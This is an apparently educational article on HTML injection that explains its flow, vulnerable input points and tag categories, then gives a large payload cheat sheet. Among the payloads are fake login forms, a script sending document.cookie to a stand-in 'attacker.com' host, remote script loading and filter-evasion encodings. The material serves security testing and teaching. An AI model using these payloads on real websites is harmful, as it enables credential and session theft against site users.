HTML Injection
Have you ever wondered how attackers can mess with websites just by typing something unexpected into a login form or a search bar?
That’s where HTML Injection comes in! It’s a sneaky little trick where an attacker injects malicious HTML code into a web page, making it display unexpected content or even execute harmful actions. Unlike other injection attacks (like SQLi or XSS), HTML Injection is more about manipulating what users see, changing text, adding fake forms, or even embedding phishing links right inside the webpage.
Imagine filling out a contact form and instead of your message, the page suddenly displays a giant flashing banner that says, "You’ve won a million dollars! Click here!" Yeah, that’s HTML Injection at work. Sounds wild, right? Let’s break down how it works, why it happens?
How Does HTML Injection Work?
HTML Injection happens when a web application improperly handles user input, allowing attackers to inject HTML code into a webpage. This can alter the page’s structure, content, or even trick users into interacting with fake elements.
Structure of HTML Injection
HTML Injection follows a simple flow: Input → Processing → Execution → Impact
Input: Malicious Payload Injection Threat actors exploit unsanitized input vectors to inject arbitrary HTML payloads. Common attack surfaces: dynamically rendered user inputs in forms, comment sections, search queries, and URL parameters.
-
Processing: Insecure Input Handling The web application lacks proper input validation and fails to implement robust sanitization mechanisms.
-
The injected HTML is either persistently stored in the database or reflected dynamically on the web page.
-
Execution: Client-Side Rendering & DOM Manipulation The browser parses and renders the injected HTML as legitimate markup, executing unintended DOM modifications This results in unauthorized UI manipulation potential phishing vectors, or deceptive overlays.
Impact: Security Exploitation & Threat Escalation
- Website defacement via injected HTML elements.
- Credential harvesting through fake authentication interfaces.
- Clickjacking & UI redressing leading to privilege escalation or session hijacking.
- Common Applications Vulnerable to HTML Injection
- Blog & News Websites – Comment sections, user-generated content.
- Forums & Message Boards – User posts, signatures, profiles.
- E-Commerce Platforms – Product reviews, feedback forms.
- Search Engines – Search bar displaying unescaped input.
- User Profile Pages – Editable bio sections, display names.
- Login & Signup Forms – Error messages reflecting user input.
- Support & Contact Forms – Ticket submissions, chat support.
- Social Media Platforms – Posts, messages, bios.
- Online Surveys & Polls – User-submitted responses.
- URL Parameters & Redirects – Sites reflecting query strings directly in the UI.
Types of HTML Injection
1. Heading Tags & Text Formatting
These elements can be used to inject malicious scripts or deceive users by manipulating content appearance.
<h1> to <h6> (Headings): Used to disguise phishing messages or misleading alerts.<b>, <i>, <u> (Text Formatting): Emphasizes fake warnings, scams, or misleading instructions.<marquee> (Scrolling Text - Deprecated): Creates persistent, attention-grabbing malicious messages.<font> (Deprecated): Alters text color and size to camouflage phishing links or warnings.
<h1>HTML</h1><h2>HTML</h2><h3>HTML</h3><h4>HTML</h4><h5>HTML</h5><h6>HTML</h6><b>HTML</b><i>HTML</i><u>HTML</u><mark>HTML</mark><strong>HTML</strong><em>HTML</em><small>HTML rocks</small><del>Html</del><ins>Html</ins><s>Only 50 tickets left</s><sub>Html</sub><sup>Html</sup>
2. Paragraphs, Line Breaks & Preformatted Text
These elements can be exploited to manipulate web page content, inject malicious scripts, or deceive users.
<p> (Paragraphs): Used to insert fake warnings, phishing messages, or execute scripts within text.<br> (Line Breaks): Helps in obfuscating malicious links, hiding payloads, or bypassing security filters by spreading scripts across multiple lines.<pre> (Preformatted Text): Can store encoded payloads or disguise script execution within preserved formatting, making detection harder.
<p>HTML</p><pre>HTML</pre><blockquote cite="http://google.com">HTML Injection</blockquote>Html<br>line breaks<br>injection
3. Links & Navigation
These elements can be used to redirect users, steal credentials, or load malicious content.
<a> (Anchor): Injects phishing links, auto-download malware, or perform Open Redirect attacks.<base> (Base URL): Alters relative links on the page, leading users to malicious destinations.<iframe> (Inline Frame): Embeds external malicious pages or performs clickjacking attacks.<nav> (Navigation): Manipulates site navigation to mislead users or redirect traffic to phishing pages.
<a href="https://www.google.com">HTML</a><nav>Html</nav>
4. Forms & Input Elements
Forms and input fields can be exploited to inject malicious scripts, steal credentials, or manipulate user interactions.
<form>: Can be injected with a fake login form to steal user credentials.<input>: Hidden inputs can capture sensitive data without user knowledge.<textarea>: Used to store and execute malicious scripts.<button>: Can trigger unauthorized actions when clicked.<select> & <option>: Modified to redirect users to phishing pages.
pl/?<form method="GET">Username: <input type="text" name="username" value="" /><br />Password: <input type="password" name="passwd" value="" /><br /><input type="submit" name="submit" value="login" /></form>
<form method="POST">Username: <input type="text" name="username" value="" /><br />Password: <input type="password" name="passwd" value="" /><br /><input type="submit" name="submit" value="login" /></form>
<input type="text" id="name" name="name"><select name="cars" id="cars"></select><button type="button">Click Me!</button><textarea id="HTML" name="HTML" rows="4" cols="50">Html injected</textarea><label for="html">HTML</label><legend>Html</legend><meter id="html" value="2" min="0" max="10">2 out of 10</meter><progress id="html" value="32" max="100"> 32% </progress><datalist id="html"><option value="html"></option></datalist><fieldset><legend>hello:</legend><label for="fname">First name:</label><input type="text" id="fname" name="fname"><br><br><input type="submit" value="Submit"></fieldset>
5. Multimedia Elements (Images, Video, Audio)
Multimedia elements can be exploited to execute malicious scripts, track users, or manipulate content.
<img>: Used with the onerror attribute to execute JavaScript when an image fails to load.<video> & <audio>: Can contain malicious URLs to exploit browser vulnerabilities.<source> & <track>: Injected with fake or malicious media sources to trick users.<iframe>: Embedded with malicious content to perform clickjacking attacks.
<img src="index.jpg" alt="Girl in a jacket" width="500" height="600"><video width="320" height="240" controls></video><audio controls><source src="demo.ogg" type="audio/ogg"><source src="demo.mp3" type="audio/mpeg"></audio><embed type="text/html" src="index.html" width="500" height="200">
6. Lists & Tables
Lists and tables can be manipulated to inject malicious scripts, modify webpage structure, or steal user data.
<ul>, <ol>, <li>: Can be injected with <script> or event handlers to execute malicious JavaScript.<table>, <tr>, <td>: Used to embed payloads that manipulate webpage content, steal data, or perform phishing attacks.<th> & <caption>: Can be injected with obfuscated JavaScript to execute hidden script
<ul><li>Html</li></ul><ol><li>Html</li></ol><table><th>HTML</th><th>HTML</th></table><colgroup><col span="2" style="background-color:red"></colgroup><dl><dt>Html</dt><dd>Html</dd></dl>
7. Structural Elements & Metadata
Structural elements and metadata can be exploited to inject malicious payloads, manipulate page behavior, or execute unauthorized scripts.
<header>, <footer>, <section>, <article>: Can be injected with malicious scripts to modify webpage layout or perform phishing attacks.<meta>: Often used for injecting JavaScript payloads via http-equiv="refresh" to redirect users to malicious sites.<title> & <base>: Can be manipulated to alter page behavior, redirect links, or disguise phishing attempts.
<body><h1>HTML html</h1></body><header>HTML html</header><footer>HTML html</footer><main>Html</main><section>HTML</section><article><h2>Armour Infosec</h2></article><aside>Html</aside><summary>Html</summary><details><summary>HTML</summary><p>html html</p></details><address>address,address</address>
8. Encoding Variations & Escaped Characters
Encoding and escaping techniques can be used to bypass security filters and execute HTML injection attacks.
URL Encoding (%3Cscript%3E): Converts special characters to their encoded form to evade filtering mechanisms.Hex/Unicode Encoding (<script>): Injects payloads using hexadecimal or Unicode representations of characters.Double Encoding (%253Cscript%253E): Encodes characters multiple times to bypass weak validation rules.HTML Entity Encoding (<script>): Uses escaped entities to smuggle scripts past sanitization filters.
<h1>HTML</h1><h1>HTML</h1>%3Ch1%3EHTML%3C%2Fh1%3E%253Ch1%253EHTML%253C%252Fh1%253E
9. Interactive Elements
Interactive elements can be exploited for HTML injection by injecting malicious scripts or modifying event handlers.
Buttons (<button onclick="alert(1)">Click Me</button>): Injects JavaScript into event attributes to execute scripts on user interaction.Forms (<form action="evil.com">): Redirects user input to malicious sites for data theft.On-Event Handlers (<div onmouseover="alert(1)">Hover me</div>): Triggers JavaScript execution when users interact with elements.iframes (<iframe src="javascript:alert(1)">): Embeds malicious content or performs phishing attacks.
<dialog open>Html</dialog><dialog close></dialog><iframe src="https://www.google.com" title="test"></iframe><iframe id="if1" src="https://www.google.com"></iframe><iframe id="if2" src="https://www.google.com"></iframe><canvas id="myCanvas">draw htmli</canvas><noscript>Sorry, your browser does not support Html</noscript>
10. Time, Data & Other Elements
These elements can be leveraged for HTML injection by manipulating attributes or inserting malicious scripts.
Date & Time (<time datetime="2025-02-08" onmouseover="alert(1)">Hover for surprise</time>): Injects scripts into attributes.Data Attributes (<data value="exploit" onfocus="alert(1)">Click Me</data>): Embeds malicious payloads in custom attributes.Meter & Progress (<meter value="50" max="100" onmouseover="alert(1)">): Executes scripts when users interact with the element.Output (<output oninput="alert(1)">Test</output>): Injects scripts to execute upon input changes.
<time>10:10</time><time datetime="2008-02-14 20:00">HTML</time><data value="21053">test html</data><wbr>HTML html<wbr><bdi>Html</bdi> injection<bdo dir="rtl">HTML html</bdo>
11. Base, Scripts & Styles
These elements can be exploited to manipulate page behavior or execute scripts.
Base (<base href="javascript:alert(1)//">): Alters URL resolution, leading to script execution.Scripts (<script>alert(1)</script>): Direct execution of JavaScript for malicious purposes.Event Handlers (<img src="x" onerror="alert(1)">): Embeds JavaScript in attributes to trigger execution.Styles (<style>@import 'javascript:alert(1)';</style>): Injects JavaScript via CSS imports.
<base href="javascript:alert(1)//"><script>alert(document.cookie);</script><script>fetch('https://attacker.com/steal?c='+document.cookie);</script><img src="x" onerror="alert(1)"><body onload=alert(1)><base href="https://attacker.com/malicious.js"><script src="https://attacker.com/malicious.js"></script><style>@import url('https://attacker.com/malicious.css');</style><link rel="stylesheet" href="https://attacker.com/malicious.css"><svg onload=alert(1)><iframe src="javascript:alert(1)"></iframe><meta http-equiv="refresh" content="0;url=javascript:alert(1)">
12. HTML Injection Payloads
<h1>HTML</h1><!--qq<h1>HTML</h1>qq<h1>HTML</h1>qq<<h1>HTML</h1><<h1>HTML</h1>>%253Ch1%253EHTML%253C%252Fh1%253E<script>alert(1);</script><img src=x onerror=alert(1)><iframe src="javascript:alert(1)"></iframe><svg onload=alert(1)><body onload=alert(1)><link rel="stylesheet" href="javascript:alert(1);"><style>@import url("javascript:alert(1)");</style><base href="javascript:alert(1)//"><input type="text" value='<script>alert(1)</script>'><form action="javascript:alert(1)"><meta http-equiv="refresh" content="0;url=javascript:alert(1)"><object data="javascript:alert(1)"></object><embed src="javascript:alert(1)"><a href="javascript:alert(1)">Click me</a><marquee onstart=alert(1)>Malicious</marquee><video onerror=alert(1)><source src="invalid.mp4"></video><details open ontoggle=alert(1)><button onclick=alert(1)>Click Me</button><audio src=x onerror=alert(1)><textarea onfocus=alert(1)>Click here</textarea><img src="javascript:alert(1);"><frame src="javascript:alert(1)"></frame><table background="javascript:alert(1)"><div style="background:url(javascript:alert(1))"><blink onmouseover=alert(1)>Hover me</blink><meta charset="javascript:alert(1)"><applet code="javascript:alert(1)"></applet>
Writeups
- Exploiting XSS - Injecting into Direct HTML
- Comprehensive Guide on HTML Injection
- Testing for HTML Injection
- Testing For HTML Injection
- Html-Injection
Cheatsheets
- Offensive-Payloads
- HTMLcheathseet
- HTML Injection
- Security Cheat Sheet
- HTML5 Security Cheatsheet
- HTML/JavaScript Comments